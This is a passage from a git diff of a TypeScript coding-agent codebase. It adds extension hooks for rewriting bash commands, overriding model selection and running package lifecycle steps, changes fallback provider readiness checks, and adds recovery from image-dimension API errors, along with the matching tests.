+ * did not clear the array. Later, bindCore() replayed and registered the
+ * same providers again, stacking wrappers.
+ */
+
+interface ProviderEntry {
+  name: string;
+  config: Record<string, unknown>;
+}
+
+interface MockRuntime {
+  pendingProviderRegistrations: ProviderEntry[];
+}
+
+describe("provider registration preflush", () => {
+  it("clears pending registrations after preflush so bindCore does not replay", () => {
+    const registered: string[] = [];
+    const runtime: MockRuntime = {
+      pendingProviderRegistrations: [
+        { name: "ollama", config: { type: "ollama" } },
+        { name: "custom-provider", config: { type: "custom" } },
+      ],
+    };
+
+    // Simulate sdk.ts preflush (lines 220-223)
+    for (const { name } of runtime.pendingProviderRegistrations) {
+      registered.push(name);
+    }
+    // The fix: clear after preflush
+    runtime.pendingProviderRegistrations = [];
+
+    // Simulate bindCore() flush (runner.ts lines 268-271)
+    for (const { name } of runtime.pendingProviderRegistrations) {
+      registered.push(name);
+    }
+    runtime.pendingProviderRegistrations = [];
+
+    assert.deepEqual(
+      registered,
+      ["ollama", "custom-provider"],
+      "each provider should be registered exactly once",
+    );
+  });
+
+  it("without the fix, providers are registered twice", () => {
+    const registered: string[] = [];
+    const runtime: MockRuntime = {
+      pendingProviderRegistrations: [
+        { name: "ollama", config: { type: "ollama" } },
+      ],
+    };
+
+    // Old behavior: preflush without clearing
+    for (const { name } of runtime.pendingProviderRegistrations) {
+      registered.push(name);
+    }
+    // NOT clearing — simulating the old bug
+
+    // bindCore() replays the same queue
+    for (const { name } of runtime.pendingProviderRegistrations) {
+      registered.push(name);
+    }
+
+    assert.deepEqual(
+      registered,
+      ["ollama", "ollama"],
+      "without clearing, providers are registered twice (demonstrating the bug)",
+    );
+  });
+});
diff --git a/packages/pi-coding-agent/src/core/extensions/runner.test.ts b/packages/pi-coding-agent/src/core/extensions/runner.test.ts
index b11ae2d9a..8a5dcca24 100644
--- a/packages/pi-coding-agent/src/core/extensions/runner.test.ts
+++ b/packages/pi-coding-agent/src/core/extensions/runner.test.ts
@@ -48,37 +48,37 @@ function makeThrowingExtension(eventType: string, error: Error): Extension {
 }
 
 describe("ExtensionRunner.emitToolCall", () => {
-	it("catches throwing extension handler and routes to emitError", async () => {
+	it("catches throwing extension handler and routes to emitError", async (t) => {
 		const dir = mkdtempSync(join(tmpdir(), "runner-test-"));
-		try {
-			const sessionManager = SessionManager.create(dir, dir);
-			const authStorage = AuthStorage.create();
-			const modelRegistry = new ModelRegistry(authStorage, join(dir, "models.json"));
-
-			const throwingExt = makeThrowingExtension("tool_call", new Error("handler crashed"));
-			const runtime = makeMinimalRuntime();
-			const runner = new ExtensionRunner([throwingExt], runtime, dir, sessionManager, modelRegistry);
-
-			const errors: any[] = [];
-			runner.onError((err) => errors.push(err));
-
-			const event: ToolCallEvent = {
-				type: "tool_call",
-				toolCallId: "test-123",
-				toolName: "test_tool",
-				input: {},
-			} as ToolCallEvent;
-
-			const result = await runner.emitToolCall(event);
-
-			// Should not throw — error is caught and routed to emitError
-			assert.equal(result, undefined);
-			assert.equal(errors.length, 1);
-			assert.equal(errors[0].error, "handler crashed");
-			assert.equal(errors[0].event, "tool_call");
-			assert.equal(errors[0].extensionPath, "/test/throwing-ext");
-		} finally {
+		t.after(() => {
 			rmSync(dir, { recursive: true, force: true });
-		}
+		});
+
+		const sessionManager = SessionManager.create(dir, dir);
+		const authStorage = AuthStorage.create();
+		const modelRegistry = new ModelRegistry(authStorage, join(dir, "models.json"));
+
+		const throwingExt = makeThrowingExtension("tool_call", new Error("handler crashed"));
+		const runtime = makeMinimalRuntime();
+		const runner = new ExtensionRunner([throwingExt], runtime, dir, sessionManager, modelRegistry);
+
+		const errors: any[] = [];
+		runner.onError((err) => errors.push(err));
+
+		const event: ToolCallEvent = {
+			type: "tool_call",
+			toolCallId: "test-123",
+			toolName: "test_tool",
+			input: {},
+		} as ToolCallEvent;
+
+		const result = await runner.emitToolCall(event);
+
+		// Should not throw — error is caught and routed to emitError
+		assert.equal(result, undefined);
+		assert.equal(errors.length, 1);
+		assert.equal(errors[0].error, "handler crashed");
+		assert.equal(errors[0].event, "tool_call");
+		assert.equal(errors[0].extensionPath, "/test/throwing-ext");
 	});
 });
diff --git a/packages/pi-coding-agent/src/core/extensions/runner.ts b/packages/pi-coding-agent/src/core/extensions/runner.ts
index cde7cfa57..048ad534c 100644
--- a/packages/pi-coding-agent/src/core/extensions/runner.ts
+++ b/packages/pi-coding-agent/src/core/extensions/runner.ts
@@ -13,6 +13,8 @@ import type { SessionManager } from "../session-manager.js";
 import type {
 	BeforeAgentStartEvent,
 	BeforeAgentStartEventResult,
+	BeforeModelSelectEvent,
+	BeforeModelSelectResult,
 	BeforeProviderRequestEvent,
 	CompactOptions,
 	ContextEvent,
@@ -230,6 +232,8 @@ export class ExtensionRunner {
 		this.cwd = cwd;
 		this.sessionManager = sessionManager;
 		this.modelRegistry = modelRegistry;
+		// Bind emit methods into the shared runtime so createExtensionAPI can delegate to them.
+		this.runtime.emitBeforeModelSelect = (event) => this.emitBeforeModelSelect(event);
 	}
 
 	bindCore(actions: ExtensionActions, contextActions: ExtensionContextActions): void {
@@ -634,6 +638,24 @@ export class ExtensionRunner {
 		return result;
 	}
 
+	async emitBashTransform(command: string, cwd: string): Promise<string> {
+		if (!this.hasHandlers("bash_transform")) return command;
+
+		let current = command;
+		await this.invokeHandlers(
+			"bash_transform",
+			() => ({ type: "bash_transform" as const, command: current, cwd }),
+			(handlerResult) => {
+				const result = handlerResult as import("./types.js").BashTransformEventResult | undefined;
+				if (result?.command && result.command.trim()) {
+					current = result.command;
+				}
+				return { done: false }; // chain all handlers
+			},
+		);
+		return current;
+	}
+
 	async emitUserBash(event: UserBashEvent): Promise<UserBashEventResult | undefined> {
 		let result: UserBashEventResult | undefined;
 
@@ -676,6 +698,21 @@ export class ExtensionRunner {
 		return currentPayload;
 	}
 
+	async emitBeforeModelSelect(event: Omit<BeforeModelSelectEvent, "type">): Promise<BeforeModelSelectResult | undefined> {
+		let result: BeforeModelSelectResult | undefined;
+		await this.invokeHandlers("before_model_select", () => ({
+			type: "before_model_select" as const,
+			...event,
+		} satisfies BeforeModelSelectEvent), (handlerResult) => {
+			if (handlerResult) {
+				result = handlerResult as BeforeModelSelectResult;
+				return { done: true }; // first override wins
+			}
+			return { done: false };
+		});
+		return result;
+	}
+
 	async emitBeforeAgentStart(
 		prompt: string,
 		images: ImageContent[] | undefined,
diff --git a/packages/pi-coding-agent/src/core/extensions/types.ts b/packages/pi-coding-agent/src/core/extensions/types.ts
index 22b05a1a6..f4c153992 100644
--- a/packages/pi-coding-agent/src/core/extensions/types.ts
+++ b/packages/pi-coding-agent/src/core/extensions/types.ts
@@ -603,10 +603,45 @@ export interface ModelSelectEvent {
 	source: ModelSelectSource;
 }
 
+/** Fired before model selection runs capability scoring. Extensions can override the selected model. */
+export interface BeforeModelSelectEvent {
+	type: "before_model_select";
+	unitType: string;
+	unitId: string;
+	classification: { tier: string; reason: string; downgraded: boolean };
+	taskMetadata?: Record<string, unknown>;
+	eligibleModels: string[];
+	phaseConfig?: { primary: string; fallbacks: string[] };
+}
+
+/** Result from before_model_select event handler. Return { modelId } to override selection. */
+export interface BeforeModelSelectResult {
+	modelId: string;
+}
+
 // ============================================================================
 // User Bash Events
 // ============================================================================
 
+/**
+ * Fired before the bash tool executes a shell command.
+ * Extensions can return a transformed command string.
+ * All registered handlers are called in order; each receives the output of the previous.
+ */
+export interface BashTransformEvent {
+	type: "bash_transform";
+	/** The command string about to be executed */
+	command: string;
+	/** Current working directory */
+	cwd: string;
+}
+
+/** Result from bash_transform event handler */
+export interface BashTransformEventResult {
+	/** Replacement command string. If omitted or empty, the original command is used. */
+	command?: string;
+}
+
 /** Fired when user executes a bash command via ! or !! prefix */
 export interface UserBashEvent {
 	type: "user_bash";
@@ -846,6 +881,7 @@ export type ExtensionEvent =
 	| ToolExecutionUpdateEvent
 	| ToolExecutionEndEvent
 	| ModelSelectEvent
+	| BashTransformEvent
 	| UserBashEvent
 	| InputEvent
 	| ToolCallEvent
@@ -949,6 +985,33 @@ export interface RegisteredCommand {
 	handler: (args: string, ctx: ExtensionCommandContext) => Promise<void>;
 }
 
+export type LifecycleHookScope = "user" | "project";
+export type LifecycleHookPhase = "beforeInstall" | "afterInstall" | "beforeRemove" | "afterRemove";
+
+export interface LifecycleHookContext {
+	/** Lifecycle phase currently being executed. */
+	phase: LifecycleHookPhase;
+	/** Package source string passed to install (npm:, git:, https://, local path). */
+	source: string;
+	/** Resolved installed package path (or resolved local path), when available for this phase. */
+	installedPath?: string;
+	/** Where the package was installed. */
+	scope: LifecycleHookScope;
+	/** Current working directory for the install invocation. */
+	cwd: string;
+	/** Whether install is running in an interactive TTY. */
+	interactive: boolean;
+	/** Info-level logging sink for install output. */
+	log(message: string): void;
+	/** Warning-level logging sink for install output. */
+	warn(message: string): void;
+	/** Error-level logging sink for install output. */
+	error(message: string): void;
+}
+
+export type LifecycleHookHandler = (ctx: LifecycleHookContext) => Promise<void> | void;
+export type LifecycleHookMap = Record<LifecycleHookPhase, LifecycleHookHandler[]>;
+
 // ============================================================================
 // Extension API
 // ============================================================================
@@ -1000,10 +1063,19 @@ export interface ExtensionAPI {
 	on(event: "tool_execution_update", handler: ExtensionHandler<ToolExecutionUpdateEvent>): void;
 	on(event: "tool_execution_end", handler: ExtensionHandler<ToolExecutionEndEvent>): void;
 	on(event: "model_select", handler: ExtensionHandler<ModelSelectEvent>): void;
+	on(event: "bash_transform", handler: ExtensionHandler<BashTransformEvent, BashTransformEventResult>): void;
 	on(event: "tool_call", handler: ExtensionHandler<ToolCallEvent, ToolCallEventResult>): void;
 	on(event: "tool_result", handler: ExtensionHandler<ToolResultEvent, ToolResultEventResult>): void;
 	on(event: "user_bash", handler: ExtensionHandler<UserBashEvent, UserBashEventResult>): void;
 	on(event: "input", handler: ExtensionHandler<InputEvent, InputEventResult>): void;
+	on(event: "before_model_select", handler: ExtensionHandler<BeforeModelSelectEvent, BeforeModelSelectResult>): void;
+
+	// =========================================================================
+	// Event Emission (for host extensions that orchestrate model selection)
+	// =========================================================================
+
+	/** Emit before_model_select event. Returns override model ID or undefined. */
+	emitBeforeModelSelect(event: Omit<BeforeModelSelectEvent, "type">): Promise<BeforeModelSelectResult | undefined>;
 
 	// =========================================================================
 	// Tool Registration
@@ -1019,6 +1091,18 @@ export interface ExtensionAPI {
 	/** Register a custom command. */
 	registerCommand(name: string, options: Omit<RegisteredCommand, "name">): void;
 
+	/** Register a lifecycle hook run before package installation starts. */
+	registerBeforeInstall(handler: LifecycleHookHandler): void;
+
+	/** Register a lifecycle hook run after package installation completes. */
+	registerAfterInstall(handler: LifecycleHookHandler): void;
+
+	/** Register a lifecycle hook run before package removal starts. */
+	registerBeforeRemove(handler: LifecycleHookHandler): void;
+
+	/** Register a lifecycle hook run after package removal completes. */
+	registerAfterRemove(handler: LifecycleHookHandler): void;
+
 	/** Register a keyboard shortcut. */
 	registerShortcut(
 		shortcut: KeyId,
@@ -1201,6 +1285,11 @@ export interface ExtensionAPI {
 
 /** Configuration for registering a provider via pi.registerProvider(). */
 export interface ProviderConfig {
+	/** Auth behavior for provider availability and request key handling. Defaults to "apiKey". */
+	authMode?: "apiKey" | "oauth" | "externalCli" | "none";
+	/** Optional readiness check. Return false if the provider cannot accept requests (e.g., CLI not authenticated, API key invalid).
+	 * Called before default auth checks. Trusted at the same level as extension code — extensions already have arbitrary code execution. */
+	isReady?: () => boolean;
 	/** Base URL for the API endpoint. Required when defining models. */
 	baseUrl?: string;
 	/** API key or environment variable name. Required when defining models (unless oauth provided). */
@@ -1252,6 +1341,8 @@ export interface ProviderModelConfig {
 	headers?: Record<string, string>;
 	/** OpenAI compatibility settings. */
 	compat?: Model<Api>["compat"];
+	/** Opaque provider-specific options (e.g. Ollama keep_alive, num_gpu). */
+	providerOptions?: Record<string, unknown>;
 }
 
 /** Extension factory function type. Supports both sync and async initialization. */
@@ -1302,6 +1393,8 @@ export interface ExtensionRuntimeState {
 	 */
 	registerProvider: (name: string, config: ProviderConfig) => void;
 	unregisterProvider: (name: string) => void;
+	/** Emit before_model_select event to all registered handlers. Bound by ExtensionRunner. */
+	emitBeforeModelSelect: (event: Omit<BeforeModelSelectEvent, "type">) => Promise<BeforeModelSelectResult | undefined>;
 }
 
 /**
@@ -1382,6 +1475,7 @@ export interface Extension {
 	commands: Map<string, RegisteredCommand>;
 	flags: Map<string, ExtensionFlag>;
 	shortcuts: Map<KeyId, ExtensionShortcut>;
+	lifecycleHooks: LifecycleHookMap;
 }
 
 /** Result of loading extensions. */
diff --git a/packages/pi-coding-agent/src/core/extensions/wrapper.ts b/packages/pi-coding-agent/src/core/extensions/wrapper.ts
index b8d050dfc..d328f7610 100644
--- a/packages/pi-coding-agent/src/core/extensions/wrapper.ts
+++ b/packages/pi-coding-agent/src/core/extensions/wrapper.ts
@@ -44,6 +44,15 @@ export function wrapToolWithExtensions<T>(tool: AgentTool<any, T>, runner: Exten
 			signal?: AbortSignal,
 			onUpdate?: AgentToolUpdateCallback<T>,
 		) => {
+			// For bash tool calls, let extensions transform the command before execution
+			if (tool.name === "bash" && runner.hasHandlers("bash_transform")) {
+				const input = params as { command?: string; cwd?: string };
+				if (typeof input.command === "string") {
+					const transformed = await runner.emitBashTransform(input.command, input.cwd ?? "");
+					params = { ...params, command: transformed };
+				}
+			}
+
 			// Emit tool_call event - extensions can block execution
 			if (runner.hasHandlers("tool_call")) {
 				try {
diff --git a/packages/pi-coding-agent/src/core/fallback-resolver.test.ts b/packages/pi-coding-agent/src/core/fallback-resolver.test.ts
index c62f5d473..f454d1c8e 100644
--- a/packages/pi-coding-agent/src/core/fallback-resolver.test.ts
+++ b/packages/pi-coding-agent/src/core/fallback-resolver.test.ts
@@ -38,6 +38,7 @@ function createResolver(overrides?: {
 	enabled?: boolean;
 	isProviderAvailable?: (provider: string) => boolean;
 	hasAuth?: (provider: string) => boolean;
+	isProviderRequestReady?: (provider: string) => boolean;
 	find?: (provider: string, modelId: string) => Model<Api> | undefined;
 }) {
 	const settingsManager = {
@@ -60,6 +61,7 @@ function createResolver(overrides?: {
 			if (provider === "openai" && modelId === "gpt-4.1") return openaiModel;
 			return undefined;
 		}),
+		isProviderRequestReady: overrides?.isProviderRequestReady ?? overrides?.hasAuth ?? (() => true),
 	} as unknown as ModelRegistry;
 
 	return { resolver: new FallbackResolver(settingsManager, authStorage, modelRegistry), authStorage };
@@ -122,9 +124,9 @@ describe("FallbackResolver — findFallback", () => {
 		assert.equal(result, null);
 	});
 
-	it("skips providers without auth", async () => {
+	it("skips providers that are not request-ready", async () => {
 		const { resolver } = createResolver({
-			hasAuth: (provider: string) => provider !== "alibaba",
+			isProviderRequestReady: (provider: string) => provider !== "alibaba",
 		});
 
 		const result = await resolver.findFallback(zaiModel, "quota_exhausted");
@@ -133,6 +135,17 @@ describe("FallbackResolver — findFallback", () => {
 		assert.equal(result!.model.provider, "openai");
 	});
 
+	it("allows fallback to external-cli style providers without stored auth", async () => {
+		const { resolver } = createResolver({
+			hasAuth: () => false,
+			isProviderRequestReady: (provider: string) => provider === "alibaba",
+		});
+
+		const result = await resolver.findFallback(zaiModel, "quota_exhausted");
+		assert.notEqual(result, null);
+		assert.equal(result!.model.provider, "alibaba");
+	});
+
 	it("skips providers with no model in registry", async () => {
 		const { resolver } = createResolver({
 			find: (provider: string, modelId: string) => {
diff --git a/packages/pi-coding-agent/src/core/fallback-resolver.ts b/packages/pi-coding-agent/src/core/fallback-resolver.ts
index 5d6b61499..e390f2038 100644
--- a/packages/pi-coding-agent/src/core/fallback-resolver.ts
+++ b/packages/pi-coding-agent/src/core/fallback-resolver.ts
@@ -149,9 +149,8 @@ export class FallbackResolver {
 			const model = this.modelRegistry.find(entry.provider, entry.model);
 			if (!model) continue;
 
-			// Check if API key is available
-			const hasAuth = this.authStorage.hasAuth(entry.provider);
-			if (!hasAuth) continue;
+			// Check if provider is request-ready for fallback (authMode-aware)
+			if (!this.modelRegistry.isProviderRequestReady(entry.provider)) continue;
 
 			return {
 				model,
diff --git a/packages/pi-coding-agent/src/core/fs-utils.test.ts b/packages/pi-coding-agent/src/core/fs-utils.test.ts
index 997080e4c..6c20beba1 100644
--- a/packages/pi-coding-agent/src/core/fs-utils.test.ts
+++ b/packages/pi-coding-agent/src/core/fs-utils.test.ts
@@ -1,66 +1,54 @@
 import assert from "node:assert/strict";
-import { describe, it } from "node:test";
+import { describe, it, afterEach } from "node:test";
 import { mkdtempSync, readFileSync, rmSync, existsSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { atomicWriteFileSync } from "./fs-utils.js";
 
 describe("atomicWriteFileSync", () => {
-	it("writes file content atomically", () => {
-		const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
-		try {
-			const filePath = join(dir, "test.txt");
-			atomicWriteFileSync(filePath, "hello world");
-			assert.equal(readFileSync(filePath, "utf-8"), "hello world");
-		} finally {
+	let dir: string;
+
+	afterEach(() => {
+		if (dir) {
 			rmSync(dir, { recursive: true, force: true });
 		}
 	});
 
+	it("writes file content atomically", () => {
+		dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
+		const filePath = join(dir, "test.txt");
+		atomicWriteFileSync(filePath, "hello world");
+		assert.equal(readFileSync(filePath, "utf-8"), "hello world");
+	});
+
 	it("overwrites existing file atomically", () => {
-		const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
-		try {
-			const filePath = join(dir, "test.txt");
-			atomicWriteFileSync(filePath, "first");
-			atomicWriteFileSync(filePath, "second");
-			assert.equal(readFileSync(filePath, "utf-8"), "second");
-		} finally {
-			rmSync(dir, { recursive: true, force: true });
-		}
+		dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
+		const filePath = join(dir, "test.txt");
+		atomicWriteFileSync(filePath, "first");
+		atomicWriteFileSync(filePath, "second");
+		assert.equal(readFileSync(filePath, "utf-8"), "second");
 	});
 
 	it("does not leave .tmp file after successful write", () => {
-		const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
-		try {
-			const filePath = join(dir, "test.txt");
-			atomicWriteFileSync(filePath, "content");
-			assert.equal(existsSync(filePath + ".tmp"), false);
-		} finally {
-			rmSync(dir, { recursive: true, force: true });
-		}
+		dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
+		const filePath = join(dir, "test.txt");
+		atomicWriteFileSync(filePath, "content");
+		assert.equal(existsSync(filePath + ".tmp"), false);
 	});
 
 	it("supports Buffer content", () => {
-		const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
-		try {
-			const filePath = join(dir, "test.bin");
-			const buf = Buffer.from([0x00, 0x01, 0x02, 0xff]);
-			atomicWriteFileSync(filePath, buf);
-			const result = readFileSync(filePath);
-			assert.deepEqual(result, buf);
-		} finally {
-			rmSync(dir, { recursive: true, force: true });
-		}
+		dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
+		const filePath = join(dir, "test.bin");
+		const buf = Buffer.from([0x00, 0x01, 0x02, 0xff]);
+		atomicWriteFileSync(filePath, buf);
+		const result = readFileSync(filePath);
+		assert.deepEqual(result, buf);
 	});
 
 	it("supports encoding parameter", () => {
-		const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
-		try {
-			const filePath = join(dir, "test.txt");
-			atomicWriteFileSync(filePath, "utf8 content", "utf-8");
-			assert.equal(readFileSync(filePath, "utf-8"), "utf8 content");
-		} finally {
-			rmSync(dir, { recursive: true, force: true });
-		}
+		dir = mkdtempSync(join(tmpdir(), "fs-utils-test-"));
+		const filePath = join(dir, "test.txt");
+		atomicWriteFileSync(filePath, "utf8 content", "utf-8");
+		assert.equal(readFileSync(filePath, "utf-8"), "utf8 content");
 	});
 });
diff --git a/packages/pi-coding-agent/src/core/image-overflow-recovery.test.ts b/packages/pi-coding-agent/src/core/image-overflow-recovery.test.ts
new file mode 100644
index 000000000..de075c280
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/image-overflow-recovery.test.ts
@@ -0,0 +1,228 @@
+import assert from "node:assert/strict";
+import { describe, it } from "node:test";
+import {
+	isImageDimensionError,
+	MANY_IMAGE_MAX_DIMENSION,
+	downsizeConversationImages,
+} from "./image-overflow-recovery.js";
+import type { Message } from "@gsd/pi-ai";
+
+// ─── isImageDimensionError ────────────────────────────────────────────────────
+
+describe("isImageDimensionError", () => {
+	it("returns true for Anthropic many-image dimension error", () => {
+		const errorMessage =
+			'Error: 400 {"type":"error","error":{"type":"invalid_request_error","message":"messages.125.content.38.image.source.base64.data: At least one of the image dimensions exceed max allowed size for many-image requests: 2000 pixels"}}';
+		assert.equal(isImageDimensionError(errorMessage), true);
+	});
+
+	it("returns true for bare dimension exceed message", () => {
+		const errorMessage =
+			"image dimensions exceed max allowed size for many-image requests: 2000 pixels";
+		assert.equal(isImageDimensionError(errorMessage), true);
+	});
+
+	it("returns false for unrelated 400 error", () => {
+		const errorMessage =
+			'Error: 400 {"type":"error","error":{"type":"invalid_request_error","message":"max_tokens: 4096 > 2048"}}';
+		assert.equal(isImageDimensionError(errorMessage), false);
+	});
+
+	it("returns false for rate limit error", () => {
+		assert.equal(isImageDimensionError("429 rate limit exceeded"), false);
+	});
+
+	it("returns false for empty string", () => {
+		assert.equal(isImageDimensionError(""), false);
+	});
+
+	it("returns false for undefined", () => {
+		assert.equal(isImageDimensionError(undefined), false);
+	});
+});
+
+// ─── MANY_IMAGE_MAX_DIMENSION ─────────────────────────────────────────────────
+
+describe("MANY_IMAGE_MAX_DIMENSION", () => {
+	it("is less than 2000 (the API-enforced limit)", () => {
+		assert.ok(MANY_IMAGE_MAX_DIMENSION < 2000);
+	});
+
+	it("is a positive integer", () => {
+		assert.ok(MANY_IMAGE_MAX_DIMENSION > 0);
+		assert.equal(MANY_IMAGE_MAX_DIMENSION, Math.floor(MANY_IMAGE_MAX_DIMENSION));
+	});
+});
+
+// ─── helpers ──────────────────────────────────────────────────────────────────
+
+function makeUserMsg(content: Message["content"] & any): Message {
+	return { role: "user", content, timestamp: Date.now() } as Message;
+}
+
+function makeAssistantMsg(text: string): Message {
+	return {
+		role: "assistant",
+		content: [{ type: "text", text }],
+		api: "anthropic-messages",
+		provider: "anthropic",
+		model: "claude-opus-4-6",
+		usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } },
+		stopReason: "stop",
+		timestamp: Date.now(),
+	} as Message;
+}
+
+function makeToolResultMsg(images: number): Message {
+	const content: any[] = [];
+	for (let i = 0; i < images; i++) {
+		content.push({ type: "image", data: `img${i}`, mimeType: "image/png" });
+	}
+	return {
+		role: "toolResult",
+		toolCallId: `tc${Math.random()}`,
+		toolName: "screenshot",
+		content,
+		isError: false,
+		timestamp: Date.now(),
+	} as Message;
+}
+
+// ─── downsizeConversationImages ───────────────────────────────────────────────
+
+describe("downsizeConversationImages", () => {
+	it("counts images in user and toolResult messages", () => {
+		const messages: Message[] = [
+			makeUserMsg([
+				{ type: "image", data: "img1", mimeType: "image/png" },
+				{ type: "image", data: "img2", mimeType: "image/png" },
+			]),
+			makeAssistantMsg("I see them"),
+			makeToolResultMsg(1),
+		];
+
+		const result = downsizeConversationImages(messages);
+		assert.equal(result.imageCount, 3);
+	});
+
+	it("returns processed=false when no images present", () => {
+		const messages: Message[] = [
+			makeUserMsg("just text"),
+			makeAssistantMsg("reply"),
+		];
+
+		const result = downsizeConversationImages(messages);
+		assert.equal(result.imageCount, 0);
+		assert.equal(result.processed, false);
+	});
+
+	it("returns processed=false when image count <= RECENT_IMAGES_TO_KEEP", () => {
+		const messages: Message[] = [
+			makeUserMsg([
+				{ type: "image", data: "img1", mimeType: "image/png" },
+			]),
+			makeAssistantMsg("got it"),
+		];
+
+		const result = downsizeConversationImages(messages);
+		assert.equal(result.imageCount, 1);
+		assert.equal(result.processed, false);
+	});
+
+	it("strips older images when many images present, preserves recent ones", () => {
+		const messages: Message[] = [];
+		for (let i = 0; i < 25; i++) {
+			messages.push(
+				makeUserMsg([
+					{ type: "text", text: `message ${i}` },
+					{ type: "image", data: `img${i}`, mimeType: "image/png" },
+				]),
+			);
+			messages.push(makeAssistantMsg(`reply ${i}`));
+		}
+
+		const result = downsizeConversationImages(messages);
+		assert.ok(result.processed);
+		assert.equal(result.imageCount, 25);
+		assert.equal(result.strippedCount, 20); // 25 - 5 recent
+
+		// Count remaining images
+		let remainingImages = 0;
+		for (const msg of messages) {
+			if (msg.role === "assistant") continue;
+			if (typeof msg.content === "string") continue;
+			const arr = msg.content as any[];
+			for (const block of arr) {
+				if (block.type === "image") remainingImages++;
+			}
+		}
+		assert.equal(remainingImages, 5, "Should keep exactly 5 most recent images");
+
+		// The 5 most recent user messages (indices 40,42,44,46,48) should have images
+		for (let i = 20; i < 25; i++) {
+			const userMsg = messages[i * 2]; // user messages at even indices
+			const arr = userMsg.content as any[];
+			const hasImage = arr.some((c: any) => c.type === "image");
+			assert.ok(hasImage, `Recent message ${i} should retain its image`);
+		}
+	});
+
+	it("adds text placeholder when stripping an image", () => {
+		const messages: Message[] = [];
+		for (let i = 0; i < 10; i++) {
+			messages.push(
+				makeUserMsg([
+					{ type: "image", data: `img${i}`, mimeType: "image/jpeg" },
+				]),
+			);
+			messages.push(makeAssistantMsg(`reply ${i}`));
+		}
+
+		downsizeConversationImages(messages);
+
+		// First message's image should have been replaced with text
+		const firstMsg = messages[0];
+		const arr = firstMsg.content as any[];
+		const placeholder = arr.find(
+			(c: any) => c.type === "text" && c.text.includes("[image removed"),
+		);
+		assert.ok(placeholder, "Stripped image should be replaced with text placeholder");
+		assert.ok(
+			placeholder.text.includes("image/jpeg"),
+			"Placeholder should mention original mime type",
+		);
+	});
+
+	it("handles toolResult messages with images", () => {
+		const messages: Message[] = [];
+		for (let i = 0; i < 10; i++) {
+			messages.push(makeToolResultMsg(1));
+			messages.push(makeAssistantMsg(`reply ${i}`));
+		}
+
+		const result = downsizeConversationImages(messages);
+		assert.equal(result.imageCount, 10);
+		assert.equal(result.strippedCount, 5);
+		assert.ok(result.processed);
+	});
+
+	it("handles mixed user and toolResult images", () => {
+		const messages: Message[] = [];
+		for (let i = 0; i < 8; i++) {
+			messages.push(
+				makeUserMsg([
+					{ type: "text", text: `check ${i}` },
+					{ type: "image", data: `uimg${i}`, mimeType: "image/png" },
+				]),
+			);
+			messages.push(makeAssistantMsg(`processing ${i}`));
+			messages.push(makeToolResultMsg(1));
+			messages.push(makeAssistantMsg(`done ${i}`));
+		}
+
+		const result = downsizeConversationImages(messages);
+		// 8 user images + 8 tool result images = 16 total
+		assert.equal(result.imageCount, 16);
+		assert.equal(result.strippedCount, 11); // 16 - 5 recent
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/image-overflow-recovery.ts b/packages/pi-coding-agent/src/core/image-overflow-recovery.ts
new file mode 100644
index 000000000..3573514e4
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/image-overflow-recovery.ts
@@ -0,0 +1,118 @@
+/**
+ * Image overflow recovery for many-image sessions.
+ *
+ * When a conversation accumulates many images (screenshots, file reads, etc.),
+ * the Anthropic API enforces a stricter per-image dimension limit (2000px) for
+ * "many-image requests." This module detects the resulting 400 error and
+ * recovers by stripping older images from the conversation history, preserving
+ * the most recent ones to maintain session continuity.
+ *
+ * @see https://github.com/gsd-build/gsd-2/issues/2874
+ */
+
+import type { Message, ImageContent, TextContent } from "@gsd/pi-ai";
+
+/**
+ * Maximum image dimension (px) that the Anthropic API allows in many-image
+ * requests. Images at or above this size in a large conversation will be
+ * rejected with a 400 error. We use 1568 as the safe ceiling (Anthropic's
+ * recommended max for multi-image requests).
+ */
+export const MANY_IMAGE_MAX_DIMENSION = 1568;
+
+/**
+ * Number of recent images to preserve when stripping old images.
+ * Keeps the most recent screenshots/images so the model retains visual context
+ * for the current task.
+ */
+const RECENT_IMAGES_TO_KEEP = 5;
+
+/**
+ * Regex matching the Anthropic API error for oversized images in many-image requests.
+ */
+const IMAGE_DIMENSION_ERROR_RE =
+	/image.dimensions?.exceed.*max.*allowed.*size.*many.image/i;
+
+/**
+ * Detect whether an error message is the Anthropic "image dimensions exceed max
+ * allowed size for many-image requests" 400 error.
+ */
+export function isImageDimensionError(errorMessage: string | undefined | null): boolean {
+	if (!errorMessage) return false;
+	return IMAGE_DIMENSION_ERROR_RE.test(errorMessage);
+}
+
+export interface DownsizeResult {
+	/** Total number of images found in the conversation */
+	imageCount: number;
+	/** Whether any images were stripped */
+	processed: boolean;
+	/** Number of images that were stripped */
+	strippedCount: number;
+}
+
+/**
+ * Strip older images from conversation messages to recover from many-image
+ * dimension errors. Preserves the N most recent images and replaces older ones
+ * with a text placeholder.
+ *
+ * Mutates messages in place (same pattern as replaceMessages/compaction).
+ *
+ * Accepts Message[] (the LLM message union) so it works with both
+ * agent.state.messages and session entries.
+ */
+export function downsizeConversationImages(messages: Message[]): DownsizeResult {
+	// First pass: collect all image locations (message index + content index)
+	const imageLocations: Array<{ msgIdx: number; contentIdx: number }> = [];
+
+	for (let msgIdx = 0; msgIdx < messages.length; msgIdx++) {
+		const msg = messages[msgIdx];
+		if (msg.role === "assistant") continue;
+
+		// UserMessage can have string content; ToolResultMessage always has array
+		if (msg.role === "user" && typeof msg.content === "string") continue;
+
+		const contentArr = msg.content as (TextContent | ImageContent)[];
+		if (!Array.isArray(contentArr)) continue;
+
+		for (let contentIdx = 0; contentIdx < contentArr.length; contentIdx++) {
+			if (contentArr[contentIdx].type === "image") {
+				imageLocations.push({ msgIdx, contentIdx });
+			}
+		}
+	}
+
+	const imageCount = imageLocations.length;
+	if (imageCount === 0) {
